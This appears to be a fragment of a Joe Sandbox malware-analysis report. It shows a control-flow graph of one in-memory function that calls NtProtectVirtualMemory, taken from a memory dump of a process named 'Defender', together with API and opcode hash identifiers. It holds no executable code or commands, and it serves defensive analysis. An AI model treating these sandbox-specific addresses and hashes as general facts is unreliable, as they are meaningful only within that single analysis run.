                                                                                                                                                                                                                                            control_flow_graph 0 7ff848f317cd-7ff848f318b3 NtProtectVirtualMemory 5 7ff848f318bb-7ff848f318dd 0->5 6 7ff848f318b5 0->6 8 7ff848f318de-7ff848f318f5 5->8 6->5 9 7ff848f31900-7ff848f31918 8->9 10 7ff848f318f7-7ff848f318ff 8->10 9->8 12 7ff848f3191a 9->12 10->9 13 7ff848f3191c-7ff848f31925 12->13 14 7ff848f31994 12->14 15 7ff848f31937 13->15 16 7ff848f31927-7ff848f3192c 13->16 17 7ff848f319be-7ff848f31a82 call 7ff848f30eb8 14->17 18 7ff848f31996 14->18 20 7ff848f3196f-7ff848f31971 15->20 21 7ff848f31939 15->21 16->20 52 7ff848f31a87-7ff848f31a8d 17->52 22 7ff848f31998-7ff848f3199f 18->22 23 7ff848f319bc 18->23 25 7ff848f31973-7ff848f31978 20->25 26 7ff848f319a1-7ff848f319b5 20->26 21->20 27 7ff848f3193b-7ff848f3195f call 7ff848f28e40 * 2 21->27 23->17 29 7ff848f3197a 25->29 30 7ff848f31985-7ff848f31987 25->30 32 7ff848f319b7-7ff848f319ba 26->32 43 7ff848f31960-7ff848f31968 call 7ff848f30950 27->43 29->30 34 7ff848f3197c-7ff848f3197e 29->34 30->32 35 7ff848f31989-7ff848f3198e 30->35 32->23 38 7ff848f31990 34->38 39 7ff848f31980 34->39 35->38 40 7ff848f3192e-7ff848f31930 35->40 38->40 44 7ff848f31992 38->44 39->30 42 7ff848f31932 40->42 40->43 42->15 43->29 51 7ff848f3196a 43->51 44->14 51->20 53 7ff848f31a8f-7ff848f31a9c call 7ff848f26950 52->53 54 7ff848f31aa1-7ff848f31aa7 52->54 53->54 56 7ff848f31aa9-7ff848f31acb call 7ff848f28e40 54->56 57 7ff848f31ad2-7ff848f31ad8 54->57 60 7ff848f31ada-7ff848f31b01 call 7ff848f30e40 56->60 78 7ff848f31acd 56->78 57->60 61 7ff848f31b06-7ff848f31b0c 57->61 60->61 62 7ff848f31b18-7ff848f31b1e 61->62 63 7ff848f31b0e-7ff848f31b13 call 7ff848f251f8 61->63 67 7ff848f31b3b-7ff848f31b41 62->67 68 7ff848f31b20-7ff848f31b34 62->68 63->62 72 7ff848f31b59-7ff848f31b5f 67->72 73 7ff848f31b43-7ff848f31b52 call 7ff848f26940 67->73 68->60 83 7ff848f31b36 68->83 75 7ff848f31b80-7ff848f31b86 72->75 76 7ff848f31b61-7ff848f31b75 72->76 73->60 89 7ff848f31b54 73->89 81 7ff848f31b88-7ff848f31baa call 7ff848f28e40 75->81 82 7ff848f31bb5-7ff848f31bbb 75->82 76->56 92 7ff848f31b7b 76->92 78->57 107 7ff848f31bb0 81->107 108 7ff848f31c85-7ff848f31ca7 call 7ff848f28e40 81->108 87 7ff848f31bbd-7ff848f31bc2 call 7ff848f251f8 82->87 88 7ff848f31bc7-7ff848f31bcd 82->88 83->67 87->88 90 7ff848f31bcf-7ff848f31bdc call 7ff848f26950 88->90 91 7ff848f31be1-7ff848f31be7 88->91 89->72 90->91 96 7ff848f31be9-7ff848f31c02 call 7ff848f28e40 91->96 97 7ff848f31c07-7ff848f31c0d 91->97 92->75 96->97 102 7ff848f31c38-7ff848f31c3e 97->102 103 7ff848f31c0f-7ff848f31c31 call 7ff848f28e40 97->103 104 7ff848f31c5a-7ff848f31c60 102->104 105 7ff848f31c40-7ff848f31c4f call 7ff848f26940 102->105 103->108 123 7ff848f31c33 103->123 112 7ff848f31c62 104->112 113 7ff848f31c67-7ff848f31c6d 104->113 105->56 119 7ff848f31c55 105->119 107->82 124 7ff848f31ca9-7ff848f31cc0 call 7ff848f30e40 108->124 125 7ff848f31cc7-7ff848f31ce1 call 7ff848f30e40 108->125 112->113 113->52 117 7ff848f31c73-7ff848f31c80 call 7ff848f251f8 113->117 119->104 123->102 124->125 136 7ff848f31cc2 call 7ff848f26918 124->136 134 7ff848f31ce8-7ff848f31cf3 125->134 135 7ff848f31ce3 call 7ff848f26918 125->135 138 7ff848f31d3b-7ff848f31d59 134->138 139 7ff848f31cf5-7ff848f31d12 134->139 135->134 136->125 148 7ff848f31d60-7ff848f31d68 138->148 143 7ff848f31d69-7ff848f31d94 139->143 144 7ff848f31d14-7ff848f31d39 139->144 144->138
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000011.00000002.2763082160.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_17_2_7ff848f25000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2706961497-0
                                                                                                                                                                                                                                            • Opcode ID: 558c94bedc885c6f6e960ff22c69a9e017f520d815c388de3e17bb39e86f5794
                                                                                                                                                                                                                                            • Instruction ID: d5a148ebde705bb52b907c383ca49b90c440f48f4600c2a4a9fa986f578abd33
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 558c94bedc885c6f6e960ff22c69a9e017f520d815c388de3e17bb39e86f5794
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB020731E1D68A0FEB95BB28D8552B83BA2EF95390F0501BBE44CC72D3DF2C68468745